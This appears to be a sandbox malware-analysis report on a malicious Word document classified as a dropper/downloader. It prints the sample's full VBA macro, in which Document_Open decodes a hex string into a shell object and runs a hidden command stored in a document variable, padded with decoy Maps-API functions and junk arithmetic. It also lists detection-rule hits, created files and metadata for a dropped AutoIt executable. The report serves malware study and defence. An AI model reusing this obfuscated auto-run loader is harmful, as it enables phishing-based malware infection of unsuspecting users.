Dynamic Analysis Report |
Classification: Dropper, Downloader |
7ea94da41974adefe99eeb883523b757cea10becf09185af05b9f464faa70712 (SHA256)
2019 Order File TTYYUGH.doc
Created at 2019-02-11 09:17:00
Notifications (2/4)
Due to a WHOIS service error, no query could be made to get WHOIS data of any contacted domain.
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
The operating system was rebooted during the analysis.
Remarks
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
This list contains only the embedded files and created files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\2019 Order File TTYYUGH.doc | Sample File | Word Document |
Suspicious
|
...
|
Title | ld6c2a |
Subject | ze3d553 |
Description | In this exquisitely made and terrifying new horror film, the age-old concepts of witchcraft, black magic and possession are innovatively brought together to tell the |
Revision | 1 |
Create Time | 2019-02-11 04:16:00+00:00 |
Modify Time | 2019-02-11 04:16:00+00:00 |
Codepage | Latin-1 |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
Line Count | 1 |
Paragraph Count | 1 |
Character Count | 1 |
Chars With Spaces | 1 |
Heading Pairs | Title |
Titles Of Parts | ld6c2a |
bytes | 11000 |
scale_crop | False |
shared_doc | False |
URL | First Seen | Categories | Threat Names | Reputation Status | WHOIS Data |
---|---|---|---|---|---|
http://maps.googleapis.com/maps/api/distancematrix/json?origins= | - | - | - |
Unknown
|
Not Queried
|
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public s33ace8fdc5c9 As Object
Public Function GetDuration(start As String, dest As String)
Dim firstVal As String, secondVal As String, lastVal As String
firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
secondVal = "&destinations="
lastVal = "&mode=car&language=en&sensor=false&key=YOUR_KEY"
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send ("")
If InStr(objHTTP.responseText, """duration"" : {") = 0 Then GoTo ErrorHandl
Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = "duration(?:.|\n)*?""value"".*?([0-9]+)": regex.Global = False
Set matches = regex.Execute(objHTTP.responseText)
tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
GetDuration = CDbl(tmpVal)
Exit Function
ErrorHandl:
GetDuration = -1
End Function
Public Function GetDistanceCoord(ByVal lat1 As Double, ByVal lon1 As Double, ByVal lat2 As Double, ByVal lon2 As Double, ByVal unit As String) As Double
Dim theta As Double: theta = lon1 - lon2
Dim dist As Double: dist = Math.Sin(deg2rad(lat1)) * Math.Sin(deg2rad(lat2)) + Math.Cos(deg2rad(lat1)) * Math.Cos(deg2rad(lat2)) * Math.Cos(deg2rad(theta))
dist = WorksheetFunction.Acos(dist)
dist = rad2deg(dist)
dist = dist * 60 * 1.1515
If unit = "K" Then
dist = dist * 1.609344
ElseIf unit = "N" Then
dist = dist * 0.8684
End If
GetDistanceCoord = dist
End Function
Function deg2rad(ByVal deg As Double) As Double
deg2rad = (deg * WorksheetFunction.Pi / 180#)
End Function
Function rad2deg(ByVal rad As Double) As Double
rad2deg = rad / WorksheetFunction.Pi * 180#
End Function
Sub Document_Open()
Set s33ace8fdc5c9 = CreateObject(v6c45839c88("938F9FAEA5ACB06A8FA4A1A8A8"))
Dim n8a5c2884d54 As Long: n8a5c2884d54 = 10
Dim d8b2c8b5b9 As String
Dim v7ecf581c3c363b7639 As Long
Select Case n8a5c2884d54
Case 18 / Int(24 + 21 / 21) / 13 / Int(9 + 26 / 14) / 10
d8b2c8b5b9 = "j2c61c53"
Case 8 - (21 + 21) - 5 + (192 - 312) + Int(20 + 19 - 22) + 18
d8b2c8b5b9 = "g6f9d8ec638fe23"
Case 11 + (336 - 204) + Int(12 + 15 - 21) + 11 - (6 + 19) - 27 * Int(94 / 91 + 19) - Int(4196 / 1845) * 20
d8b2c8b5b9 = "ae8bafbc4"
Case 17 - (28 + 4) - 6 * Int(79 / 94 + 15) - Int(1265 / 1203) * 10
d8b2c8b5b9 = "o536c9fd"
Case 17 - (9 + 23) - 29 * Int(40 / 34 + 16) - Int(4223 / 3561) * 9 * Int(43 / 52 + 13) - Int(4880 / 5548) * 17
d8b2c8b5b9 = "g6434749aa99a"
Case 24 - (21 + 12) - 10 * Int(84 / 38 + 12) - Int(3318 / 1447) * 18 * Int(91 / 86 + 15) - Int(4864 / 2601) * 25
d8b2c8b5b9 = "rb861c34df544"
Case 28 / Int(26 + 25 / 5) / 28 + (96 - 180) + Int(6 + 21 - 28) + 11
d8b2c8b5b9 = "rf99bd"
Case 28 - (26 + 12) - 14 - (26 + 5) - 6 * Int(79 / 97 + 14) - Int(3661 / 4548) * 13
d8b2c8b5b9 = "v55ed1fa"
Case 27 + (144 - 240) + Int(5 + 7 - 26) + 27 * Int(55 / 50 + 14) - Int(4041 / 3725) * 22 * Int(13 / 66 + 19) - Int(4977 / 4926) * 5
d8b2c8b5b9 = "c3eb74ec8a5c"
Case 16 / Int(8 + 27 / 22) / 8 + (132 - 216) + Int(21 + 13 - 22) + 16 + (216 - 168) + Int(13 + 11 - 7) + 27
d8b2c8b5b9 = "o89da94b"
Case 25 / Int(28 + 24 / 13) / 10 * Int(67 / 51 + 19) - Int(3907 / 3819) * 25
d8b2c8b5b9 = "a6721c2c6d3b6cf"
Case 18 + (324 - 96) + Int(13 + 4 - 29) + 27 * Int(9 / 40 + 12) - Int(3206 / 5343) * 4
d8b2c8b5b9 = "ofb6ab34527ea"
Case 8 - (27 + 11) - 14 + (96 - 48) + Int(12 + 28 - 19) + 9 * Int(62 / 92 + 11) - Int(3350 / 5894) * 28
d8b2c8b5b9 = "k1a442dfc"
Case 7 - (16 + 12) - 21 / Int(19 + 15 / 28) / 13
d8b2c8b5b9 = "c5d1312545d4"
Case 26 - (11 + 26) - 29 - (4 + 24) - 12 + (348 - 276) + Int(14 + 13 - 9) + 7
d8b2c8b5b9 = "p97cd69ec"
Case 20 + (276 - 204) + Int(28 + 18 - 13) + 8 - (17 + 8) - 5 + (252 - 72) + Int(29 + 12 - 25) + 19
d8b2c8b5b9 = "d8cbb37e1"
Case 19 + (48 - 108) + Int(5 + 22 - 10) + 16 + (156 - 108) + Int(18 + 12 - 5) + 4 / Int(17 + 27 / 9) / 26
d8b2c8b5b9 = "fbf7bbd9c5fc675"
Case 8 + (84 - 132) + Int(29 + 5 - 20) + 6 / Int(26 + 18 / 8) / 6 + (48 - 216) + Int(25 + 13 - 4) + 7
d8b2c8b5b9 = "tfa3d72373fff"
Case 12 * Int(98 / 46 + 12) - Int(3698 / 829) * 4 - (19 + 6) - 9 + (276 - 84) + Int(14 + 15 - 8) + 15
d8b2c8b5b9 = "ef7f3d4aac29c"
Case 29 + (132 - 72) + Int(19 + 8 - 18) + 13 / Int(6 + 12 / 20) / 26 + (264 - 216) + Int(7 + 22 - 28) + 5
d8b2c8b5b9 = "ndcff162e79c3"
Case 22 / Int(23 + 12 / 23) / 26 / Int(4 + 17 / 7) / 15
d8b2c8b5b9 = "v35849"
Case 26 + (324 - 120) + Int(17 + 25 - 6) + 10 - (16 + 27) - 20
d8b2c8b5b9 = "wffe2b"
Case 21 - (14 + 29) - 11 + (180 - 72) + Int(4 + 13 - 20) + 13 * Int(70 / 40 + 11) - Int(4427 / 4106) * 8
d8b2c8b5b9 = "v8ae49641"
Case 26 * Int(19 / 34 + 12) - Int(4837 / 2741) * 26 / Int(23 + 5 / 20) / 14 + (108 - 192) + Int(7 + 16 - 15) + 16
d8b2c8b5b9 = "a91db91f479214e"
Case 17 * Int(42 / 43 + 12) - Int(2462 / 4951) * 28 - (20 + 22) - 29
d8b2c8b5b9 = "f686b8f9c16"
Case 18 * Int(55 / 91 + 16) - Int(242 / 4383) * 21 - (22 + 15) - 28
d8b2c8b5b9 = "r491b494358"
Case 22 * Int(52 / 45 + 9) - Int(3428 / 3718) * 13 + (72 - 348) + Int(28 + 11 - 10) + 11
d8b2c8b5b9 = "k88d6711911a54"
Case 28 - (6 + 26) - 23 * Int(36 / 92 + 17) - Int(1972 / 28) * 7
d8b2c8b5b9 = "w41b5c"
Case 18 * Int(92 / 62 + 17) - Int(182 / 953) * 28 / Int(23 + 23 / 19) / 9
d8b2c8b5b9 = "ya83f65548728c"
Case 29 + (144 - 48) + Int(20 + 23 - 9) + 14 * Int(60 / 67 + 10) - Int(4879 / 3526) * 4 / Int(20 + 6 / 16) / 7
d8b2c8b5b9 = "qdf9f4c"
Case 7 / Int(10 + 28 / 22) / 21 / Int(4 + 20 / 8) / 19 / Int(28 + 22 / 5) / 15
d8b2c8b5b9 = "e5257ac4ddba8fc"
Case 14 / Int(8 + 22 / 26) / 13 - (17 + 12) - 15
d8b2c8b5b9 = "m6e62cd66b2c"
Case 11 / Int(15 + 20 / 4) / 8 + (144 - 180) + Int(14 + 8 - 5) + 21
d8b2c8b5b9 = "t7c57888b742e"
Case 21 * Int(75 / 97 + 18) - Int(497 / 1477) * 26 * Int(67 / 63 + 12) - Int(3557 / 3108) * 21
d8b2c8b5b9 = "p7cb6a8e"
Case 24 / Int(11 + 15 / 26) / 10 * Int(36 / 77 + 12) - Int(535 / 5680) * 7 / Int(15 + 8 / 12) / 6
d8b2c8b5b9 = "p14616963"
Case 24 * Int(92 / 75 + 9) - Int(3602 / 5378) * 17 * Int(63 / 83 + 18) - Int(1045 / 1299) * 26 + (156 - 336) + Int(8 + 29 - 17) + 22
d8b2c8b5b9 = "q3f8fa1e3395dd3"
Case 23 - (7 + 27) - 28 / Int(18 + 26 / 28) / 20 + (168 - 96) + Int(23 + 15 - 12) + 13
d8b2c8b5b9 = "w4a6c61e7dcc1cc"
Case 10:
n8cfe4c59ad ("lcd7e4fd5f")
Case 11 / Int(16 + 10 / 19) / 23 + (132 - 144) + Int(29 + 25 - 4) + 15 * Int(39 / 93 + 16) - Int(1721 / 5656) * 5
d8b2c8b5b9 = "b3fa886"
Case 18 + (60 - 156) + Int(29 + 28 - 29) + 25 - (28 + 16) - 8
d8b2c8b5b9 = "b6f545c1c"
Case 25 - (11 + 5) - 19 - (21 + 21) - 4 + (324 - 144) + Int(19 + 14 - 7) + 22
d8b2c8b5b9 = "ne677ccbbb8e71"
Case 29 - (14 + 29) - 29 / Int(24 + 9 / 8) / 17 * Int(30 / 82 + 11) - Int(1534 / 5784) * 26
d8b2c8b5b9 = "l3573aa7911155"
Case 21 + (324 - 336) + Int(26 + 27 - 18) + 12 / Int(10 + 25 / 25) / 29 + (228 - 144) + Int(13 + 27 - 16) + 26
d8b2c8b5b9 = "e699f7"
Case 13 / Int(8 + 25 / 23) / 22 * Int(27 / 57 + 12) - Int(501 / 172) * 29
d8b2c8b5b9 = "j5d8774c"
Case 26 / Int(19 + 21 / 14) / 24 - (13 + 18) - 17
d8b2c8b5b9 = "b9e5b13416271f"
Case 5 * Int(62 / 82 + 9) - Int(1798 / 3090) * 22 * Int(30 / 73 + 15) - Int(3007 / 5717) * 18
d8b2c8b5b9 = "uf8abe8b43"
Case 20 + (216 - 240) + Int(22 + 22 - 5) + 26 - (7 + 7) - 7
d8b2c8b5b9 = "g44ccd6f22f9a4c"
Case 16 - (9 + 29) - 27 / Int(22 + 29 / 15) / 24
d8b2c8b5b9 = "j3f38e21294"
Case 11 + (96 - 300) + Int(18 + 26 - 11) + 4 + (48 - 192) + Int(28 + 13 - 27) + 16
d8b2c8b5b9 = "ba75c719ae4da"
Case 11 * Int(20 / 39 + 12) - Int(3767 / 1750) * 9 * Int(33 / 93 + 18) - Int(748 / 1613) * 19 / Int(11 + 16 / 15) / 9
d8b2c8b5b9 = "bdb17f99f2e9f5"
Case 8 - (14 + 20) - 24 - (9 + 27) - 19 * Int(17 / 87 + 9) - Int(1281 / 3988) * 15
d8b2c8b5b9 = "c5d4532"
Case 7 - (21 + 23) - 4 / Int(6 + 25 / 27) / 6 / Int(15 + 13 / 27) / 19
d8b2c8b5b9 = "r6dccec9b271d"
Case 28 / Int(18 + 16 / 27) / 25 + (108 - 288) + Int(24 + 5 - 28) + 4 + (264 - 312) + Int(24 + 27 - 16) + 6
d8b2c8b5b9 = "jbdb64"
Case 22 + (168 - 276) + Int(13 + 5 - 13) + 8 - (8 + 24) - 9 + (180 - 240) + Int(26 + 5 - 6) + 4
d8b2c8b5b9 = "jc16774f4"
Case 20 + (276 - 132) + Int(11 + 15 - 20) + 28 / Int(24 + 22 / 22) / 16 * Int(48 / 92 + 12) - Int(2860 / 3784) * 10
d8b2c8b5b9 = "kf4f54d64c"
Case 19 / Int(9 + 29 / 19) / 21 + (276 - 180) + Int(8 + 11 - 5) + 27
d8b2c8b5b9 = "p22d774b"
Case 9 - (5 + 16) - 22 + (156 - 252) + Int(7 + 12 - 14) + 4
d8b2c8b5b9 = "k77de361f23"
Case 24 / Int(19 + 15 / 29) / 9 - (18 + 29) - 4 - (13 + 4) - 6
d8b2c8b5b9 = "obfb49f2ae"
Case 11 / Int(7 + 24 / 22) / 8 / Int(17 + 8 / 23) / 23
d8b2c8b5b9 = "c6c583a99e"
Case 17 + (228 - 156) + Int(10 + 23 - 11) + 23 * Int(21 / 53 + 19) - Int(1574 / 870) * 10 * Int(78 / 68 + 18) - Int(2798 / 32) * 27
d8b2c8b5b9 = "g42fbb761c3a6"
End Select
End Sub
Private Function n8cfe4c59ad(ByVal j2664a23fa3e66 As String) As String
s33ace8fdc5c9.Run v6c45839c88(ActiveDocument.Variables("f3744ca427ddf").Value), 0, True
End Function
Private Function v6c45839c88(ByVal j2664a23fa3e66 As String)
Dim l9a5e7d996c As String: Dim f8b5964b14a9a8c As Long
For f8b5964b14a9a8c = 1 To Len(j2664a23fa3e66) Step 2
l9a5e7d996c = l9a5e7d996c & Chr(Val(Chr(Int(0 + Int(14 / 7) - 8 + Int(11 / 9) + Int(10 / 1) + 5 + Int(10 / 7) + Int(13 / 7) + Int(9 / 9) + 25)) & Chr(Int(0 + Int(9 / 8) - 11 + 5 + 4 - 13 + 86)) & Right(Left(j2664a23fa3e66, f8b5964b14a9a8c + ((34 + 6 - 20) / 2 - 9)), (43 - 23 - 10 + 5 - 13))) - 60)
Next
v6c45839c88 = l9a5e7d996c
End Function
Public Function GetDistance(start As String, dest As String)
Dim firstVal As String, secondVal As String, lastVal As String
firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
secondVal = "&destinations="
lastVal = "&mode=car&language=pl&sensor=false&key=YOUR_KEY"
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send ("")
If InStr(objHTTP.responseText, """distance"" : {") = 0 Then GoTo ErrorHandl
Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = """value"".*?([0-9]+)": regex.Global = False
Set matches = regex.Execute(objHTTP.responseText)
tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
GetDistance = CDbl(tmpVal)
Exit Function
ErrorHandl:
GetDistance = -1
End Function
Rule Name | Rule Description | Classification | Severity | Actions |
---|---|---|---|---|
VBA_Download_Commands | VBA macro may attempt to download external content; possible dropper | - |
3/5
|
...
|
VBA_Execution_Commands | VBA macro may execute files or system commands | - |
3/5
|
...
|
VBA_Download_Commands | VBA macro may attempt to download external content; possible dropper | - |
3/5
|
...
|
VBA_Execution_Commands | VBA macro may execute files or system commands | - |
3/5
|
...
|
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - |
2/5
|
...
|
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - |
2/5
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | Created File | Text |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Unknown
|
...
|
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~wrs{a60a3be7-00a8-4b59-b7cf-d5673d1a51a1}.tmp | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
Image Base | 0x400000 |
Entry Point | 0x427ffa |
Size Of Code | 0x8e800 |
Size Of Initialized Data | 0x4d800 |
File Type | executable |
Subsystem | windows_gui |
Machine Type | i386 |
Compile Timestamp | 2018-03-15 13:14:39+00:00 |
LegalCopyright | ©1999-2018 Jonathan Bennett & AutoIt Team |
InternalName | AutoIt3.exe |
FileVersion | 3, 3, 14, 5 |
CompanyName | AutoIt Team |
Comments | http://www.autoitscript.com/autoit3/ |
ProductName | AutoIt v3 Script |
ProductVersion | 3, 3, 14, 5 |
FileDescription | AutoIt v3 Script |
OriginalFilename | AutoIt3.exe |
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x8e7b1 | 0x8e800 | 0x400 | cnt_code, mem_execute, mem_read | 6.67 |
.rdata | 0x490000 | 0x2fd8e | 0x2fe00 | 0x8ec00 | cnt_initialized_data, mem_read | 5.76 |
.data | 0x4c0000 | 0x8f74 | 0x5200 | 0xbea00 | cnt_initialized_data, mem_read, mem_write | 1.19 |
.rsrc | 0x4c9000 | 0xd750 | 0xd800 | 0xc3c00 | cnt_initialized_data, mem_read | 5.93 |
.reloc | 0x4d7000 | 0x71ac | 0x7200 | 0xd1400 | cnt_initialized_data, mem_discardable, mem_read | 6.8 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
WSACleanup | 0x74 | 0x4907c8 | 0xbda10 | 0xbc610 | - |
socket | 0x17 | 0x4907cc | 0xbda14 | 0xbc614 | - |
inet_ntoa | 0xc | 0x4907d0 | 0xbda18 | 0xbc618 | - |
setsockopt | 0x15 | 0x4907d4 | 0xbda1c | 0xbc61c | - |
ntohs | 0xf | 0x4907d8 | 0xbda20 | 0xbc620 | - |
recvfrom | 0x11 | 0x4907dc | 0xbda24 | 0xbc624 | - |
ioctlsocket | 0xa | 0x4907e0 | 0xbda28 | 0xbc628 | - |
htons | 0x9 | 0x4907e4 | 0xbda2c | 0xbc62c | - |
WSAStartup | 0x73 | 0x4907e8 | 0xbda30 | 0xbc630 | - |
__WSAFDIsSet | 0x97 | 0x4907ec | 0xbda34 | 0xbc634 | - |
select | 0x12 | 0x4907f0 | 0xbda38 | 0xbc638 | - |
accept | 0x1 | 0x4907f4 | 0xbda3c | 0xbc63c | - |
listen | 0xd | 0x4907f8 | 0xbda40 | 0xbc640 | - |
bind | 0x2 | 0x4907fc | 0xbda44 | 0xbc644 | - |
closesocket | 0x3 | 0x490800 | 0xbda48 | 0xbc648 | - |
WSAGetLastError | 0x6f | 0x490804 | 0xbda4c | 0xbc64c | - |
recv | 0x10 | 0x490808 | 0xbda50 | 0xbc650 | - |
sendto | 0x14 | 0x49080c | 0xbda54 | 0xbc654 | - |
send | 0x13 | 0x490810 | 0xbda58 | 0xbc658 | - |
inet_addr | 0xb | 0x490814 | 0xbda5c | 0xbc65c | - |
gethostbyname | 0x34 | 0x490818 | 0xbda60 | 0xbc660 | - |
gethostname | 0x39 | 0x49081c | 0xbda64 | 0xbc664 | - |
connect | 0x4 | 0x490820 | 0xbda68 | 0xbc668 | - |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileVersionInfoW | 0x0 | 0x49076c | 0xbd9b4 | 0xbc5b4 | 0x6 |
GetFileVersionInfoSizeW | 0x0 | 0x490770 | 0xbd9b8 | 0xbc5b8 | 0x5 |
VerQueryValueW | 0x0 | 0x490774 | 0xbd9bc | 0xbc5bc | 0xe |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
timeGetTime | 0x0 | 0x4907b8 | 0xbda00 | 0xbc600 | 0x94 |
waveOutSetVolume | 0x0 | 0x4907bc | 0xbda04 | 0xbc604 | 0xbb |
mciSendStringW | 0x0 | 0x4907c0 | 0xbda08 | 0xbc608 | 0x32 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
ImageList_ReplaceIcon | 0x0 | 0x490088 | 0xbd2d0 | 0xbbed0 | 0x6f |
ImageList_Destroy | 0x0 | 0x49008c | 0xbd2d4 | 0xbbed4 | 0x54 |
ImageList_Remove | 0x0 | 0x490090 | 0xbd2d8 | 0xbbed8 | 0x6d |
ImageList_SetDragCursorImage | 0x0 | 0x490094 | 0xbd2dc | 0xbbedc | 0x72 |
ImageList_BeginDrag | 0x0 | 0x490098 | 0xbd2e0 | 0xbbee0 | 0x50 |
ImageList_DragEnter | 0x0 | 0x49009c | 0xbd2e4 | 0xbbee4 | 0x56 |
ImageList_DragLeave | 0x0 | 0x4900a0 | 0xbd2e8 | 0xbbee8 | 0x57 |
ImageList_EndDrag | 0x0 | 0x4900a4 | 0xbd2ec | 0xbbeec | 0x5e |
ImageList_DragMove | 0x0 | 0x4900a8 | 0xbd2f0 | 0xbbef0 | 0x58 |
InitCommonControlsEx | 0x0 | 0x4900ac | 0xbd2f4 | 0xbbef4 | 0x7b |
ImageList_Create | 0x0 | 0x4900b0 | 0xbd2f8 | 0xbbef8 | 0x53 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
WNetUseConnectionW | 0x0 | 0x4903f8 | 0xbd640 | 0xbc240 | 0x49 |
WNetCancelConnection2W | 0x0 | 0x4903fc | 0xbd644 | 0xbc244 | 0xc |
WNetGetConnectionW | 0x0 | 0x490400 | 0xbd648 | 0xbc248 | 0x24 |
WNetAddConnection2W | 0x0 | 0x490404 | 0xbd64c | 0xbc24c | 0x6 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
InternetQueryDataAvailable | 0x0 | 0x49077c | 0xbd9c4 | 0xbc5c4 | 0x9b |
InternetCloseHandle | 0x0 | 0x490780 | 0xbd9c8 | 0xbc5c8 | 0x6b |
InternetOpenW | 0x0 | 0x490784 | 0xbd9cc | 0xbc5cc | 0x9a |
InternetSetOptionW | 0x0 | 0x490788 | 0xbd9d0 | 0xbc5d0 | 0xaf |
InternetCrackUrlW | 0x0 | 0x49078c | 0xbd9d4 | 0xbc5d4 | 0x74 |
HttpQueryInfoW | 0x0 | 0x490790 | 0xbd9d8 | 0xbc5d8 | 0x5a |
InternetQueryOptionW | 0x0 | 0x490794 | 0xbd9dc | 0xbc5dc | 0x9e |
HttpOpenRequestW | 0x0 | 0x490798 | 0xbd9e0 | 0xbc5e0 | 0x58 |
HttpSendRequestW | 0x0 | 0x49079c | 0xbd9e4 | 0xbc5e4 | 0x5e |
FtpOpenFileW | 0x0 | 0x4907a0 | 0xbd9e8 | 0xbc5e8 | 0x35 |
FtpGetFileSize | 0x0 | 0x4907a4 | 0xbd9ec | 0xbc5ec | 0x32 |
InternetOpenUrlW | 0x0 | 0x4907a8 | 0xbd9f0 | 0xbc5f0 | 0x99 |
InternetReadFile | 0x0 | 0x4907ac | 0xbd9f4 | 0xbc5f4 | 0x9f |
InternetConnectW | 0x0 | 0x4907b0 | 0xbd9f8 | 0xbc5f8 | 0x72 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetProcessMemoryInfo | 0x0 | 0x490484 | 0xbd6cc | 0xbc2cc | 0x15 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
IcmpCreateFile | 0x0 | 0x490154 | 0xbd39c | 0xbbf9c | 0x85 |
IcmpCloseHandle | 0x0 | 0x490158 | 0xbd3a0 | 0xbbfa0 | 0x84 |
IcmpSendEcho | 0x0 | 0x49015c | 0xbd3a4 | 0xbbfa4 | 0x87 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DestroyEnvironmentBlock | 0x0 | 0x490750 | 0xbd998 | 0xbc598 | 0x4 |
UnloadUserProfile | 0x0 | 0x490754 | 0xbd99c | 0xbc59c | 0x2c |
CreateEnvironmentBlock | 0x0 | 0x490758 | 0xbd9a0 | 0xbc5a0 | 0x0 |
LoadUserProfileW | 0x0 | 0x49075c | 0xbd9a4 | 0xbc5a4 | 0x21 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
IsThemeActive | 0x0 | 0x490764 | 0xbd9ac | 0xbc5ac | 0x3f |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DuplicateHandle | 0x0 | 0x490164 | 0xbd3ac | 0xbbfac | 0xe8 |
CreateThread | 0x0 | 0x490168 | 0xbd3b0 | 0xbbfb0 | 0xb5 |
WaitForSingleObject | 0x0 | 0x49016c | 0xbd3b4 | 0xbbfb4 | 0x4f9 |
HeapAlloc | 0x0 | 0x490170 | 0xbd3b8 | 0xbbfb8 | 0x2cb |
GetProcessHeap | 0x0 | 0x490174 | 0xbd3bc | 0xbbfbc | 0x24a |
HeapFree | 0x0 | 0x490178 | 0xbd3c0 | 0xbbfc0 | 0x2cf |
Sleep | 0x0 | 0x49017c | 0xbd3c4 | 0xbbfc4 | 0x4b2 |
GetCurrentThreadId | 0x0 | 0x490180 | 0xbd3c8 | 0xbbfc8 | 0x1c5 |
MultiByteToWideChar | 0x0 | 0x490184 | 0xbd3cc | 0xbbfcc | 0x367 |
MulDiv | 0x0 | 0x490188 | 0xbd3d0 | 0xbbfd0 | 0x366 |
GetVersionExW | 0x0 | 0x49018c | 0xbd3d4 | 0xbbfd4 | 0x2a4 |
IsWow64Process | 0x0 | 0x490190 | 0xbd3d8 | 0xbbfd8 | 0x30e |
GetSystemInfo | 0x0 | 0x490194 | 0xbd3dc | 0xbbfdc | 0x273 |
FreeLibrary | 0x0 | 0x490198 | 0xbd3e0 | 0xbbfe0 | 0x162 |
LoadLibraryA | 0x0 | 0x49019c | 0xbd3e4 | 0xbbfe4 | 0x33c |
GetProcAddress | 0x0 | 0x4901a0 | 0xbd3e8 | 0xbbfe8 | 0x245 |
WideCharToMultiByte | 0x0 | 0x4901a4 | 0xbd3ec | 0xbbfec | 0x511 |
lstrcpyW | 0x0 | 0x4901a8 | 0xbd3f0 | 0xbbff0 | 0x548 |
lstrlenW | 0x0 | 0x4901ac | 0xbd3f4 | 0xbbff4 | 0x54e |
GetModuleHandleW | 0x0 | 0x4901b0 | 0xbd3f8 | 0xbbff8 | 0x218 |
QueryPerformanceCounter | 0x0 | 0x4901b4 | 0xbd3fc | 0xbbffc | 0x3a7 |
